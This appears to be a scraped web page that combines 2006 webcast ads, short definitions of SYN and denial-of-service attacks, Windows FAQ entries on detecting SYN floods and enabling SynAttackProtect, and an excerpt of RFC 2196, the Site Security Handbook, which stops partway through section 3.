Just click on the webcast of your choice to register:
Business Benefits of Migrating .NET Workloads to the Mainframe
November 15, 2006 (2:00pm EST, 11:00am PST)
Attend this one-hour Web seminar and learn the business benefits and cost savings opportunities of porting .NET applications to the Mainframe, optimizing the cost of ownership of both the Mainframe and .NET applications. Find out how enterprises with a large and growing Windows server farm and a Mainframe can reduce software licensing fees, operational expenses and TCO significantly, by consolidating distributed .NET workloads onto WebSphere or zOS running on System z.
Register Now > The Benefits of Embedding High Value Business Intelligence For ISVs and On Demand Application Providers
November 16, 2006 (12:00pm EST, 9:00am PST)
Learn how embedding high value business intelligence solutions into your business applications and processes can help you deliver solutions to your customers, meeting performance optimization requirements and operational efficiency. Sign up today and access a free download of the whitepaper:
The Benefits of Embedding High Value Business Intelligence.
Register Now > Storage Strategies for Small Businesses
November 7, 2006--2 p.m. EST, 11 a.m. PST
When it comes to storage, small and medium businesses have a lot in common with large enterprises. Just like the Fortune 400, they need to ensure that data is backed up, retrievable and secure, and that data access complies with governmental regulations. Unfortunately, if you are a small business owner you also cope with some challenges the big guys don't have, budgets are small and your IT staff, if you even have one, may not have storage-specific expertise. Attend this webcast and learn storage strategies to meet your growing business demands.
Register Now >
A sender transmits a volume of connections that cannot be completed. This causes the connection queues to fill up, thereby denying service to legitimate TCP users. A TCP SYN attack (also called SYN attack) is a common type of Denial of Service attack.

See also DoS attack.

Short for denial-of-service attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IP protocols. For all known DoS attacks, there are software fixes that system administrators can install to limit the damage caused by the attacks. But, like viruses, new DoS attacks are constantly being dreamed up by hackers.

What is a SYN attack?
A Web Exclusive from FAQ for Windows
December 25, 2002
John Savill
TCP/IP
InstantDoc #37488
FAQ for Windows

A. The SYN (TCP connection request) attack is a common denial of service (DoS) technique characterized by the following pattern:

1. Using a spoofed IP address not in use on the Internet, an attacker sends multiple SYN packets to the target machine.
2. For each SYN packet received, the target machine allocates resources and sends an acknowledgement (SYN-ACK) to the source IP address.
3. Because the target machine doesn't receive a response from the attacking machine, it attempts to resend the SYN-ACK five times, at 3-, 6-, 12-, 24-, and 48-second intervals, before unallocating the resources 96 seconds after attempting the last retry. If you add it all together, you can see that the target machine allocates resources for more than 3 minutes to respond to just one SYN attack.

When an attacker uses this technique repeatedly, the target machine eventually runs out of resources and is unable to handle any more connections, thereby denying service to legitimate users.

To determine whether your systems might be vulnerable to this type of attack, from the command prompt type

netstat -n -p tcp

Look at the output for entries in a state of SYN_RECEIVED. If you notice multiple entries, your system is vulnerable to attack. For information on how to protect yourself from such DoS attacks, see "How can I protect my system from a Denial of Service (DoS) attack?".

How can I protect my system from a Denial of Service (DoS) attack?
A Web Exclusive from FAQ for Windows
December 26, 2002
John Savill
TCP/IP
InstantDoc #37489
FAQ for Windows

A. Firewall products can protect your machines from DoS attacks, and you should use a firewall whenever possible. However, built-in Windows functionality can also help protect against DoS attacks and quickly time out SYN requests. To enable this functionality, perform the following steps:

1. Start a registry editor (e.g., regedit.exe).
2. Navigate to the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters registry subkey.
3. From the Edit menu, select New, DWORD Value.
4. Enter the name SynAttackProtect, then press Enter.
5. Double-click the new value, set it to 2, then click OK.
6. Close the registry editor.
7. Reboot the machine.

The SynAttackProtect default value is 0, which offers no protection. A value of 1 limits the number of SYN retries and delays the route cache entry when the maximum number of open TCP connections (i.e., the connections in the SYN_RECEIVED state known as TcpMaxHalfOpen) and retries (i.e., TcpMaxHalfOpenRetried) has been met. When SynAttackProtect has a value of 2, the effect is similar to when the value is set to 1 but includes a delayed Winsock notification until the three-way handshake involved in the SYN process is complete. Because Windows invokes the SynAttackProtect value only after the system exceeds the TcpMaxHalfOpen and TcpMaxHalfOpenRetried values, I recommend that you also create the TcpMaxHalfOpen and TcpMaxHalfOpenRetried values under the same registry key (both DWORD values) and set them to 100 and 80, respectively.

Go directly to:
Number
Search through RFCs, STDs, BCPs, and FYIs

Search Titles Only

View search tips
View the RFC Index
View the Most popular RFCs

Network Working Group B. Fraser
Request for Comments: 2196 Editor
FYI: 8 SEI/CMU
Obsoletes: 1244 September 1997
Category: Informational

Site Security Handbook

Status of this Memo

This memo provides information for the Internet community. It does
not specify an Internet standard of any kind. Distribution of this
memo is unlimited.

Abstract

This handbook is a guide to developing computer security policies and
procedures for sites that have systems on the Internet. The purpose
of this handbook is to provide practical guidance to administrators
trying to secure their information and services. The subjects
covered include policy content and formation, a broad range of
technical system and network security topics, and security incident
response.

Table of Contents

1. Introduction.................................................... 2
1.1 Purpose of this Work............................................ 3
1.2 Audience........................................................ 3
1.3 Definitions..................................................... 3
1.4 Related Work.................................................... 4
1.5 Basic Approach.................................................. 4
1.6 Risk Assessment................................................. 5
2. Security Policies............................................... 6
2.1 What is a Security Policy and Why Have One?..................... 6
2.2 What Makes a Good Security Policy?.............................. 9
2.3 Keeping the Policy Flexible..................................... 11
3. Architecture.................................................... 11
3.1 Objectives...................................................... 11
3.2 Network and Service Configuration............................... 14
3.3 Firewalls....................................................... 20
4. Security Services and Procedures................................ 24
4.1 Authentication.................................................. 24
4.2 Confidentiality................................................. 28
4.3 Integrity....................................................... 28

Fraser, Ed. Informational [Page 1]

RFC 2196 Site Security Handbook September 1997

4.4 Authorization................................................... 29
4.5 Access.......................................................... 30
4.6 Auditing........................................................ 34
4.7 Securing Backups................................................ 37
5. Security Incident Handling...................................... 37
5.1 Preparing and Planning for Incident Handling.................... 39
5.2 Notification and Points of Contact.............................. 42
5.3 Identifying an Incident......................................... 50
5.4 Handling an Incident............................................ 52
5.5 Aftermath of an Incident........................................ 58
5.6 Responsibilities................................................ 59
6. Ongoing Activities.............................................. 60
7. Tools and Locations............................................. 60
8. Mailing Lists and Other Resources............................... 62
9. References...................................................... 64

1. Introduction

This document provides guidance to system and network administrators
on how to address security issues within the Internet community. It
builds on the foundation provided in RFC 1244 and is the collective
work of a number of contributing authors. Those authors include:
Jules P. Aronson (aronson@nlm.nih.gov), Nevil Brownlee
(n.brownlee@auckland.ac.nz), Frank Byrum (byrum@norfolk.infi.net),
Joao Nuno Ferreira (ferreira@rccn.net), Barbara Fraser
(byf@cert.org), Steve Glass (glass@ftp.com), Erik Guttman
(erik.guttman@eng.sun.com), Tom Killalea (tomk@nwnet.net), Klaus-
Peter Kossakowski (kossakowski@cert.dfn.de), Lorna Leone
(lorna@staff.singnet.com.sg), Edward.P.Lewis
(Edward.P.Lewis.1@gsfc.nasa.gov), Gary Malkin (gmalkin@xylogics.com),
Russ Mundy (mundy@tis.com), Philip J. Nesser
(pjnesser@martigny.ai.mit.edu), and Michael S. Ramsey
(msr@interpath.net).

In addition to the principle writers, a number of reviewers provided
valuable comments. Those reviewers include: Eric Luiijf
(luiijf@fel.tno.nl), Marijke Kaat (marijke.kaat@sec.nl), Ray Plzak
(plzak@nic.mil) and Han Pronk (h.m.pronk@vka.nl).

A special thank you goes to Joyce Reynolds, ISI, and Paul Holbrook,
CICnet, for their vision, leadership, and effort in the creation of
the first version of this handbook. It is the working group's sincere
hope that this version will be as helpful to the community as the
earlier one was.

Fraser, Ed. Informational [Page 2]

RFC 2196 Site Security Handbook September 1997

1.1 Purpose of This Work

This handbook is a guide to setting computer security policies and
procedures for sites that have systems on the Internet (however, the
information provided should also be useful to sites not yet connected
to the Internet). This guide lists issues and factors that a site
must consider when setting their own policies. It makes a number of
recommendations and provides discussions of relevant areas.

This guide is only a framework for setting security policies and
procedures. In order to have an effective set of policies and
procedures, a site will have to make many decisions, gain agreement,
and then communicate and implement these policies.

1.2 Audience

The audience for this document are system and network administrators,
and decision makers (typically "middle management") at sites. For
brevity, we will use the term "administrator" throughout this
document to refer to system and network administrators.

This document is not directed at programmers or those trying to
create secure programs or systems. The focus of this document is on
the policies and procedures that need to be in place to support the
technical security features that a site may be implementing.

The primary audience for this work are sites that are members of the
Internet community. However, this document should be useful to any
site that allows communication with other sites. As a general guide
to security policies, this document may also be useful to sites with
isolated systems.

1.3 Definitions

For the purposes of this guide, a "site" is any organization that
owns computers or network-related resources. These resources may
include host computers that users use, routers, terminal servers, PCs
or other devices that have access to the Internet. A site may be an
end user of Internet services or a service provider such as a mid-
level network. However, most of the focus of this guide is on those
end users of Internet services. We assume that the site has the
ability to set policies and procedures for itself with the
concurrence and support from those who actually own the resources. It
will be assumed that sites that are parts of larger organizations
will know when they need to consult, collaborate, or take
recommendations from, the larger entity.

Fraser, Ed. Informational [Page 3]

RFC 2196 Site Security Handbook September 1997

The "Internet" is a collection of thousands of networks linked by a
common set of technical protocols which make it possible for users of
any one of the networks to communicate with, or use the services
located on, any of the other networks (FYI4, RFC 1594).

The term "administrator" is used to cover all those people who are
responsible for the day-to-day operation of system and network
resources. This may be a number of individuals or an organization.

The term "security administrator" is used to cover all those people
who are responsible for the security of information and information
technology. At some sites this function may be combined with
administrator (above); at others, this will be a separate position.

The term "decision maker" refers to those people at a site who set or
approve policy. These are often (but not always) the people who own
the resources.

1.4 Related Work

The Site Security Handbook Working Group is working on a User's Guide
to Internet Security. It will provide practical guidance to end users
to help them protect their information and the resources they use.

1.5 Basic Approach

This guide is written to provide basic guidance in developing a
security plan for your site. One generally accepted approach to
follow is suggested by Fites, et. al. [Fites 1989] and includes the
following steps:

(1) Identify what you are trying to protect.
(2) Determine what you are trying to protect it from.
(3) Determine how likely the threats are.
(4) Implement measures which will protect your assets in a cost-
effective manner.
(5) Review the process continuously and make improvements each time
a weakness is found.

Most of this document is focused on item 4 above, but the other steps
cannot be avoided if an effective plan is to be established at your
site. One old truism in security is that the cost of protecting
yourself against a threat should be less than the cost of recovering
if the threat were to strike you. Cost in this context should be
remembered to include losses expressed in real currency, reputation,
trustworthiness, and other less obvious measures. Without reasonable
knowledge of what you are protecting and what the likely threats are,
following this rule could be difficult.

Fraser, Ed. Informational [Page 4]

RFC 2196 Site Security Handbook September 1997

1.6 Risk Assessment

1.6.1 General Discussion

One of the most important reasons for creating a computer security
policy is to ensure that efforts spent on security yield cost
effective benefits. Although this may seem obvious, it is possible
to be mislead about where the effort is needed. As an example, there
is a great deal of publicity about intruders on computers systems;
yet most surveys of computer security show that, for most
organizations, the actual loss from "insiders" is much greater.

Risk analysis involves determining what you need to protect, what you
need to protect it from, and how to protect it. It is the process of
examining all of your risks, then ranking those risks by level of
severity. This process involves making cost-effective decisions on
what you want to protect. As mentioned above, you should probably
not spend more to protect something than it is actually worth.

A full treatment of risk analysis is outside the scope of this
document. [Fites 1989] and [Pfleeger 1989] provide introductions to
this topic. However, there are two elements of a risk analysis that
will be briefly covered in the next two sections:

(1) Identifying the assets
(2) Identifying the threats

For each asset, the basic goals of security are availability,
confidentiality, and integrity. Each threat should be examined with
an eye to how the threat could affect these areas.

1.6.2 Identifying the Assets

One step in a risk analysis is to identify all the things that need
to be protected. Some things are obvious, like valuable proprietary
information, intellectual property, and all the various pieces of
hardware; but, some are overlooked, such as the people who actually
use the systems. The essential point is to list all things that could
be affected by a security problem.

One list of categories is suggested by Pfleeger [Pfleeger 1989]; this
list is adapted from that source:

(1) Hardware: CPUs, boards, keyboards, terminals,
workstations, personal computers, printers, disk
drives, communication lines, terminal servers, routers.

Fraser, Ed. Informational [Page 5]

RFC 2196 Site Security Handbook September 1997

(2) Software: source programs, object programs,
utilities, diagnostic programs, operating systems,
communication programs.

(3) Data: during execution, stored on-line, archived off-line,
backups, audit logs, databases, in transit over
communication media.

(4) People: users, administrators, hardware maintainers.

(5) Documentation: on programs, hardware, systems, local
administrative procedures.

(6) Supplies: paper, forms, ribbons, magnetic media.

1.6.3 Identifying the Threats

Once the assets requiring protection are identified, it is necessary
to identify threats to those assets. The threats can then be
examined to determine what potential for loss exists. It helps to
consider from what threats you are trying to protect your assets.
The following are classic threats that should be considered.
Depending on your site, there will be more specific threats that
should be identified and addressed.

(1) Unauthorized access to resources and/or information
(2) Unintented and/or unauthorized Disclosure of information
(3) Denial of service

2. Security Policies

Throughout this document there will be many references to policies.
Often these references will include recommendations for specific
policies. Rather than repeat guidance in how to create and
communicate such a policy, the reader should apply the advice
presented in this chapter when developing any policy recommended
later in this book.

2.1 What is a Security Policy and Why Have One?

The security-related decisions you make, or fail to make, as
administrator largely determines how secure or insecure your network
is, how much functionality your network offers, and how easy your
network is to use. However, you cannot make good decisions about
security without first determining what your security goals are.
Until you determine what your security goals are, you cannot make
effective use of any collection of security tools because you simply
will not know what to check for and what restrictions to impose.

Fraser, Ed. Informational [Page 6]

RFC 2196 Site Security Handbook September 1997

For example, your goals will probably be very different from the
goals of a product vendor. Vendors are trying to make configuration
and operation of their products as simple as possible, which implies
that the default configurations will often be as open (i.e.,
insecure) as possible. While this does make it easier to install new
products, it also leaves access to those systems, and other systems
through them, open to any user who wanders by.

Your goals will be largely determined by the following key tradeoffs:

(1) services offered versus security provided -
Each service offered to users carries its own security risks.
For some services the risk outweighs the benefit of the service
and the administrator may choose to eliminate the service rather
than try to secure it.

(2) ease of use versus security -
The easiest system to use would allow access to any user and
require no passwords; that is, there would be no security.
Requiring passwords makes the system a little less convenient,
but more secure. Requiring device-generated one-time passwords
makes the system even more difficult to use, but much more
secure.

(3) cost of security versus risk of loss -
There are many different costs to security: monetary (i.e., the
cost of purchasing security hardware and software like firewalls
and one-time password generators), performance (i.e., encryption
and decryption take time), and ease of use (as mentioned above).
There are also many levels of risk: loss of privacy (i.e., the
reading of information by unauthorized individuals), loss of
data (i.e., the corruption or erasure of information), and the
loss of service (e.g., the filling of data storage space, usage
of computational resources, and denial of network access). Each
type of cost must be weighed against each type of loss.

Your goals should be communicated to all users, operations staff, and
managers through a set of security rules, called a "security policy."
We are using this term, rather than the narrower "computer security
policy" since the scope includes all types of information technology
and the information stored and manipulated by the technology.

2.1.1 Definition of a Security Policy

A security policy is a formal statement of the rules by which people
who are given access to an organization's technology and information
assets must abide.

Fraser, Ed. Informational [Page 7]

RFC 2196 Site Security Handbook September 1997

2.1.2 Purposes of a Security Policy

The main purpose of a security policy is to inform users, staff and
managers of their obligatory requirements for protecting technology
and information assets. The policy should specify the mechanisms
through which these requirements can be met. Another purpose is to
provide a baseline from which to acquire, configure and audit
computer systems and networks for compliance with the policy.
Therefore an attempt to use a set of security tools in the absence of
at least an implied security policy is meaningless.

An Appropriate Use Policy (AUP) may also be part of a security
policy. It should spell out what users shall and shall not do on the
various components of the system, including the type of traffic
allowed on the networks. The AUP should be as explicit as possible
to avoid ambiguity or misunderstanding. For example, an AUP might
list any prohibited USENET newsgroups. (Note: Appropriate Use Policy
is referred to as Acceptable Use Policy by some sites.)

2.1.3 Who Should be Involved When Forming Policy?

In order for a security policy to be appropriate and effective, it
needs to have the acceptance and support of all levels of employees
within the organization. It is especially important that corporate
management fully support the security policy process otherwise there
is little chance that they will have the intended impact. The
following is a list of individuals who should be involved in the
creation and review of security policy documents:

(1) site security administrator
(2) information technology technical staff (e.g., staff from
computing center)
(3) administrators of large user groups within the organization
(e.g., business divisions, computer science department within a
university, etc.)
(4) security incident response team
(5) representatives of the user groups affected by the security
policy
(6) responsible management
(7) legal counsel (if appropriate)

The list above is representative of many organizations, but is not
necessarily comprehensive. The idea is to bring in representation
from key stakeholders, management who have budget and policy
authority, technical staff who know what can and cannot be supported,
and legal counsel who know the legal ramifications of various policy

Fraser, Ed. Informational [Page 8]

RFC 2196 Site Security Handbook September 1997

choices. In some organizations, it may be appropriate to include EDP
audit personnel. Involving this group is important if resulting
policy statements are to reach the broadest possible acceptance. It
is also relevant to mention that the role of legal counsel will also
vary from country to country.

2.2 What Makes a Good Security Policy?

The characteristics of a good security policy are:

(1) It must be implementable through system administration
procedures, publishing of acceptable use guidelines, or other
appropriate methods.

(2) It must be enforcible with security tools, where appropriate,
and with sanctions, where actual prevention is not technically
feasible.

(3) It must clearly define the areas of responsibility for the
users, administrators, and management.

The components of a good security policy include:

(1) Computer Technology Purchasing Guidelines which specify
required, or preferred, security features. These should
supplement existing purchasing policies and guidelines.

(2) A Privacy Policy which defines reasonable expectations of
privacy regarding such issues as monitoring of electronic mail,
logging of keystrokes, and access to users' files.

(3) An Access Policy which defines access rights and privileges to
protect assets from loss or disclosure by specifying acceptable
use guidelines for users, operations staff, and management. It
should provide guidelines for external connections, data
communications, connecting devices to a network, and adding new
software to systems. It should also specify any required
notification messages (e.g., connect messages should provide
warnings about authorized usage and line monitoring, and not
simply say "Welcome").

(4) An Accountability Policy which defines the responsibilities of
users, operations staff, and management. It should specify an
audit capability, and provide incident handling guidelines
(i.e., what to do and who to contact if a possible intrusion is
detected).

Fraser, Ed. Informational [Page 9]

RFC 2196 Site Security Handbook September 1997

(5) An Authentication Policy which establishes trust through an
effective password policy, and by setting guidelines for remote
location authentication and the use of authentication devices
(e.g., one-time passwords and the devices that generate them).

(6) An Availability statement which sets users' expectations for the
availability of resources. It should address redundancy and
recovery issues, as well as specify operating hours and
maintenance down-time periods. It should also include contact
information for reporting system and network failures.

(7) An Information Technology System & Network Maintenance Policy
which describes how both internal and external maintenance
people are allowed to handle and access technology. One
important topic to be addressed here is whether remote
maintenance is allowed and how such access is controlled.
Another area for consideration here is outsourcing and how it is
managed.

(8) A Violations Reporting Policy that indicates which types of
violations (e.g., privacy and security, internal and external)
must be reported and to whom the reports are made. A non-
threatening atmosphere and the possibility of anonymous
reporting will result in a greater probability that a violation
will be reported if it is detected.

(9) Supporting Information which provides users, staff, and
management with contact information for each type of policy
violation; guidelines on how to handle outside queries about a
security incident, or information which may be considered
confidential or proprietary; and cross-references to security
procedures and related information, such as company policies and
governmental laws and regulations.

There may be regulatory requirements that affect some aspects of your
security policy (e.g., line monitoring). The creators of the
security policy should consider seeking legal assistance in the
creation of the policy. At a minimum, the policy should be reviewed
by legal counsel.

Once your security policy has been established it should be clearly
communicated to users, staff, and management. Having all personnel
sign a statement indicating that they have read, understood, and
agreed to abide by the policy is an important part of the process.
Finally, your policy should be reviewed on a regular basis to see if
it is successfully supporting your security needs.

Fraser, Ed. Informational [Page 10]

RFC 2196 Site Security Handbook September 1997

2.3 Keeping the Policy Flexible

In order for a security policy to be viable for the long term, it
requires a lot of flexibility based upon an architectural security
concept. A security policy should be (largely) independent from
specific hardware and software situations (as specific systems tend
to be replaced or moved overnight). The mechanisms for updating the
policy should be clearly spelled out. This includes the process, the
people involved, and the people who must sign-off on the changes.

It is also important to recognize that there are exceptions to every
rule. Whenever possible, the policy should spell out what exceptions
to the general policy exist. For example, under what conditions is a
system administrator allowed to go through a user's files. Also,
there may be some cases when multiple users will have access to the
same userid. For example, on systems with a "root" user, multiple
system administrators may know the password and use the root account.

Another consideration is called the "Garbage Truck Syndrome." This
refers to what would happen to a site if a key person was suddenly
unavailable for his/her job function (e.g., was suddenly ill or left
the company unexpectedly). While the greatest security resides in
the minimum dissemination of information, the risk of losing critical
information increases when that information is not shared. It is
important to determine what the proper balance is for your site.

3. Architecture

3.1 Objectives

3.1.1 Completely Defined Security Plans

All sites should define a comprehensive security plan. This plan
should be at a higher level than the specific policies discussed in
chapter 2, and it should be crafted as a framework of broad
guidelines into which specific policies will fit.

It is important to have this framework in place so that individual
policies can be consistent with the overall site security
architecture. For example, having a strong policy with regard to
Internet access and having weak restrictions on modem usage is
inconsistent with an overall philosophy of strong security
restrictions on external access.

A security plan should define: the list of network services that will
be provided; which areas of the organization will provide the
services; who will have access to those services; how access will be
provided; who will administer those services; etc.

Fraser, Ed. Informational [Page 11]

RFC 2196 Site Security Handbook September 1997

The plan should also address how incident will be handled. Chapter 5
provides an in-depth discussion of this topic, but it is important
for each site to define classes of incidents and corresponding
responses. For example, sites with firewalls should set a threshold
on the number of attempts made to foil the firewall before triggering
a response? Escallation levels should be defined for both attacks
and responses. Sites without firewalls will have to determine if a
single attempt to connect to a host constitutes an incident? What
about a systematic scan of systems?

For sites connected to the Internet, the rampant media magnification
of Internet related security incidents can overshadow a (potentially)
more serious internal security problem. Likewise, companies who have
never been connected to the Internet may have strong, well defined,
internal policies but fail to adequately address an external
connection policy.

3.1.2 Separation of Services

There are many services which a site may wish to provide for its
users, some of which may be external. There are a variety of
security reasons to attempt to isolate services onto dedicated host
computers. There are also performance reasons in most cases, but a
detailed discussion is beyond to scope of this document.

The services which a site may provide will, in most cases, have
different levels of access needs and models of trust. Services which
are essential to the security or smooth operation of a site would be
better off being placed on a dedicated machine with very limited
access (see Section 3.1.3 "deny all" model), rather than on a machine
that provides a service (or services) which has traditionally been
less secure, or requires greater accessability by users who may
accidentally suborn security.

It is also important to distinguish between hosts which operate
within different models of trust (e.g., all the hosts inside of a
firewall and any host on an exposed network).

Some of the services which should be examined for potential
separation are outlined in section 3.2.3. It is important to remember
that security is only as strong as the weakest link in the chain.
Several of the most publicized penetrations in recent years have been
through the exploitation of vulnerabilities in electronic mail
systems. The intruders were not trying to steal electronic mail, but
they used the vulnerability in that service to gain access to other
systems.

Fraser, Ed. Informational [Page 12]

RFC 2196 Site Security Handbook September 1997

If possible, each service should be running on a different machine
whose only duty is to provide a specific service. This helps to
isolate intruders and limit potential harm.

3.1.3 Deny all/ Allow all

There are two diametrically opposed underlying philosophies which can
be adopted when defining a security plan. Both alternatives are
legitimate models to adopt, and the choice between them will depend
on the site and its needs for security.

The first option is to turn off all services and then selectively
enable services on a case by case basis as they are needed. This can
be done at the host or network level as appropriate. This model,
which will here after be referred to as the "deny all" model, is
generally more secure than the other model described in the next
paragraph. More work is required to successfully implement a "deny
all" configuration as well as a better understanding of services.
Allowing only known services provides for a better analysis of a
particular service/protocol and the design of a security mechanism
suited to the security level of the site.

The other model, which will here after be referred to as the "allow
all" model, is much easier to implement, but is generally less secure
than the "deny all" model. Simply turn on all services, usually the
default at the host level, and allow all protocols to travel across
network boundaries, usually the default at the router level. As
security holes become apparent, they are restricted or patched at
either the host or network level.

Each of these models can be applied to different portions of the
site, depending on functionality requirements, administrative
control, site policy, etc. For example, the policy may be to use the
"allow all" model when setting up workstations for general use, but
adopt a "deny all" model when setting up information servers, like an
email hub. Likewise, an "allow all" policy may be adopted for
traffic between LAN's internal to the site, but a "deny all" policy
can be adopted between the site and the Internet.

Be careful when mixing philosophies as in the examples above. Many
sites adopt the theory of a hard "crunchy" shell and a soft "squishy"
middle. They are willing to pay the cost of security for their
external traffic and require strong security measures, but are
unwilling or unable to provide similar protections internally. This
works fine as long as the outer defenses are never breached and the
internal users can be trusted. Once the outer shell (firewall) is
breached, subverting the internal network is trivial.

Fraser, Ed. Informational [Page 13]

RFC 2196 Site Security Handbook September 1997

3.1.4 Identify Real Needs for Services

There is a large variety of services which may be provided, both
internally and on the Internet at large. Managing security is, in
many ways, managing access to services internal to the site and
managing how internal users access information at remote sites.

Services tend to rush like waves over the Internet. Over the years
many sites have established anonymous FTP servers, gopher servers,
wais servers, WWW servers, etc. as they became popular, but not
particularly needed, at all sites. Evaluate all new services that
are established with a skeptical attitude to determine if they are
actually needed or just the current fad sweeping the Internet.

Bear in mind that security complexity can grow exponentially with the
number of services provided. Filtering routers need to be modified
to support the new protocols. Some protocols are inherently
difficult to filter safely (e.g., RPC and UDP services), thus
providing more openings to the internal network. Services provided
on the same machine can interact in catastrophic ways. For example,
allowing anonymous FTP on the same machine as the WWW server may
allow an intruder to place a file in the anonymous FTP area and cause
the HTTP server to execute it.

3.2 Network and Service Configuration

3.2.1 Protecting the Infrastructure

Many network administrators go to great lengths to protect the hosts
on their networks. Few administrators make any effort to protect the
networks themselves. There is some rationale to this. For example,
it is far easier to protect a host than a network. Also, intruders
are likely to be after data on the hosts; damaging the network would
not serve their purposes. That said, there are still reasons to
protect the networks. For example, an intruder might divert network
traffic through an outside host in order to examine the data (i.e.,
to search for passwords). Also, infrastructure includes more than
the networks and the routers which interconnect them. Infrastructure
also includes network management (e.g., SNMP), services (e.g., DNS,
NFS, NTP, WWW), and security (i.e., user authentication and access
restrictions).

The infrastructure also needs protection against human error. When
an administrator misconfigures a host, that host may offer degraded
service. This only affects users who require that host and, unless

Fraser, Ed. Informational [Page 14]

RFC 2196 Site Security Handbook September 1997

that host is a primary server, the number of affected users will
therefore be limited. However, if a router is misconfigured, all
users who require the network will be affected. Obviously, this is a
far larger number of users than those depending on any one host.

3.2.2 Protecting the Network

There are several problems to which networks are vulnerable. The
classic problem is a "denial of service" attack. In this case, the
network is brought to a state in which it can no longer carry
legitimate users' data. There are two common ways this can be done:
by attacking the routers and by flooding the network with extraneous
traffic. Please note that the term "router" in this section is used
as an example of a larger class of active network interconnection
components that also includes components like firewalls, proxy-
servers, etc.

An attack on the router is designed to cause it to stop forwarding
packets, or to forward them improperly. The former case may be due
to a misconfiguration, the injection of a spurious routing update, or
a "flood attack" (i.e., the router is bombarded with unroutable
packets, causing its performance to degrade). A flood attack on a
network is similar to a flood attack on a router, except that the
flood packets are usually broadcast. An ideal flood attack would be
the injection of a single packet which exploits some known flaw in
the network nodes and causes them to retransmit the packet, or
generate error packets, each of which is picked up and repeated by
another host. A well chosen attack packet can even generate an
exponential explosion of transmissions.

Another classic problem is "spoofing." In this case, spurious
routing updates are sent to one or more routers causing them to
misroute packets. This differs from a denial of service attack only
in the purpose behind the spurious route. In denial of service, the
object is to make the router unusable; a state which will be quickly
detected by network users. In spoofing, the spurious route will
cause packets to be routed to a host from which an intruder may
monitor the data in the packets. These packets are then re-routed to
their correct destinations. However, the intruder may or may not
have altered the contents of the packets.

The solution to most of these problems is to protect the routing
update packets sent by the routing protocols in use (e.g., RIP-2,
OSPF). There are three levels of protection: clear-text password,
cryptographic checksum, and encryption. Passwords offer only minimal
protection against intruders who do not have direct access to the
physical networks. Passwords also offer some protection against
misconfigured routers (i.e, routers which, out of the box, attempt to

Fraser, Ed. Informational [Page 15]

RFC 2196 Site Security Handbook September 1997

route packets). The advantage of passwords is that they have a very
low overhead, in both bandwidth and CPU consumption. Checksums
protect against the injection of spurious packets, even if the
intruder has direct access to the physical network. Combined with a
sequence number, or other unique identifier, a checksum can also
protect again "replay" attacks, wherein an old (but valid at the
time) routing update is retransmitted by either an intruder or a
misbehaving router. The most security is provided by complete
encryption of sequenced, or uniquely identified, routing updates.
This prevents an intruder from determining the topology of the
network. The disadvantage to encryption is the overhead involved in
processing the updates.

RIP-2 (RFC 1723) and OSPF (RFC 1583) both support clear-text
passwords in their base design specifications. In addition, there
are extensions to each base protocol to support MD5 encryption.

Unfortunately, there is no adequate protection against a flooding
attack, or a misbehaving host or router which is flooding the
network. Fortunately, this type of attack is obvious when it occurs
and can usually be terminated relatively simply.

3.2.3 Protecting the Services

There are many types of services and each has its own security
requirements. These requirements will vary based on the intended use
of the service. For example, a service which should only be usable
within a site (e.g., NFS) may require different protection mechanisms
than a service provided for external use. It may be sufficient to
protect the internal server from external access. However, a WWW
server, which provides a home page intended for viewing by users
anywhere on the Internet, requires built-in protection. That is, the
service/protocol/server must provide whatever security may be
required to prevent unauthorized access and modification of the Web
database.

Internal services (i.e., services meant to be used only by users
within a site) and external services (i.e., services deliberately
made available to users outside a site) will, in general, have
protection requirements which differ as previously described. It is
therefore wise to isolate the internal services to one set of server
host computers and the external services to another set of server
host computers. That is, internal and external servers should not be
co-located on the same host computer. In fact, many sites go so far

Fraser, Ed. Informational [Page 16]

RFC 2196 Site Security Handbook September 1997

as to have one set of subnets (or even different networks) which are
accessible from the outside and another set which may be accessed
only within the site. Of course, there is usually a firewall which
connects these partitions. Great care must be taken to ensure that
such a firewall is operating properly.

There is increasing interest in using intranets to connect different
parts of a organization (e.g., divisions of a company). While this
document generally differentiates between external and internal
(public and private), sites using intranets should be aware that they
will need to consider three separations and take appropriate actions
when designing and offering services. A service offered to an
intranet would be neither public, nor as completely private as a
service to a single organizational subunit. Therefore, the service
would need its own supporting system, separated from both external
and internal services and networks.

One form of external service deserves some special consideration, and
that is anonymous, or guest, access. This may be either anonymous
FTP or guest (unauthenticated) login. It is extremely important to
ensure that anonymous FTP servers and guest login userids are
carefully isolated from any hosts and file systems from which outside
users should be kept. Another area to which special attention must
be paid concerns anonymous, writable access. A site may be legally
responsible for the content of publicly available information, so
careful monitoring of the information deposited by anonymous users is
advised.

Now we shall consider some of the most popular services: name
service, password/key service, authentication/proxy service,
electronic mail, WWW, file transfer, and NFS. Since these are the
most frequently used services, they are the most obvious points of
attack. Also, a successful attack on one of these services can
produce disaster all out of proportion to the innocence of the basic
service.

3.2.3.1 Name Servers (DNS and NIS(+))

The Internet uses the Domain Name System (DNS) to perform address
resolution for host and network names. The Network Information
Service (NIS) and NIS+ are not used on the global Internet, but are
subject to the same risks as a DNS server. Name-to-address
resolution is critical to the secure operation of any network. An
attacker who can successfully control or impersonate a DNS server can
re-route traffic to subvert security protections. For example,
routine traffic can be diverted to a compromised system to be
monitored; or, users can be tricked into providing authentication
secrets. An organization should create well known, protected sites

Fraser, Ed. Informational [Page 17]

RFC 2196 Site Security Handbook September 1997

to act as secondary name servers and protect their DNS masters from
denial of service attacks using filtering routers.

Traditionally, DNS has had no security capabilities. In particular,
the information returned from a query could not be checked for
modification or verified that it had come from the name server in
question. Work has been done to incorporate digital signatures into
the protocol which, when deployed, will allow the integrity of the
information to be cryptographically verified (see RFC 2065).

3.2.3.2 Password/Key Servers (NIS(+) and KDC)

Password and key servers generally protect their vital information
(i.e., the passwords and keys) with encryption algorithms. However,
even a one-way encrypted password can be determined by a dictionary
attack (wherein common words are encrypted to see if they match the
stored encryption). It is therefore necessary to ensure that these
servers are not accessable by hosts which do not plan to use them for
the service, and even those hosts should only be able to access the
service (i.e., general services, such as Telnet and FTP, should not
be allowed by anyone other than administrators).

3.2.3.3 Authentication/Proxy Servers (SOCKS, FWTK)

A proxy server provides a number of security enhancements. It allows
sites to concentrate services through a specific host to allow
